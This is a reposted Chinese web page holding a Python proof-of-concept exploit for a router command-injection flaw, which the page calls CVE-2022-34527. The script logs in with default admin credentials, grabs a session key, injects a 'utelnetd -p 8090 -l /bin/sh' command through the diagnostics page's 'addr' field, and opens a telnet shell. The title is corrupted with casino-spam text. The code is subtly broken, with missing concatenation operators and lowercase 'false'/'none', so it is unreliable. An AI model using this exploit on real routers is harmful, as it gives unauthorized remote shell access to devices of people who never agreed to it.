命令注入漏洞cve-ag真人国际厅网站

import requests

import urllib

import os

from time import sleep

from urllib.parse import unquote

 

server = "192.168.1.1"

main_url = "http://192.168.1.1:80"

headers = {

        "user-agent": "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/98.0.4758.82 safari/537.36",

        }

 

 

def login():

    s = requests.session()

    s.verify = false

    url = main_url "/cgi-bin/login.asp?user=admin&pwd=admin&_=1690122728925"

    resp = s.get(url,headers=headers,timeout=10)

    print(resp.text)

 

 

def get_session_key():

    s = requests.session()

    s.verify = false

    url = main_url "/cgi-bin/get/new_gui/get_sessionkey.asp"

    resp = s.get(url,headers=headers,timeout=10)

    sessionkey = resp.text

    print(sessionkey)

    return sessionkey

 

 

def exp(sessionkey=none):

 

    cmd = " utelnetd -p 8090 -l /bin/sh "

     

    s = requests.session()

    s.verify = false

    params = {"type":"p", "sessionkey":urllib.parse.unquote(sessionkey),"addr":urllib.parse.unquote(cmd)}

    url = main_url "/cgi-bin/new_gui/set/diagnostics.asp"

    resp = s.post(url,data=params,headers=headers,timeout=100000)

    print(resp.text)

 

 

if __name__ == '__main__':

    print("\n[*] connection ",main_url);

    login()

 

    print("[*] getting session key")

    sessionkey = get_session_key()

 

    print("[*] sending payload")

    exp(sessionkey=sessionkey)

    print("[*] running telnetd service")

    print("[*] opening telnet connection\n")

    sleep(3)

    os.system('telnet ' str(server) ' 8090')

原文链接:https://bbs.kanxue.com/thread-278127.htm

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/命令注入漏洞cve-2022-34527复现(学习记录)/

发表评论

邮箱地址不会被公开。 必填项已用*标注

网站地图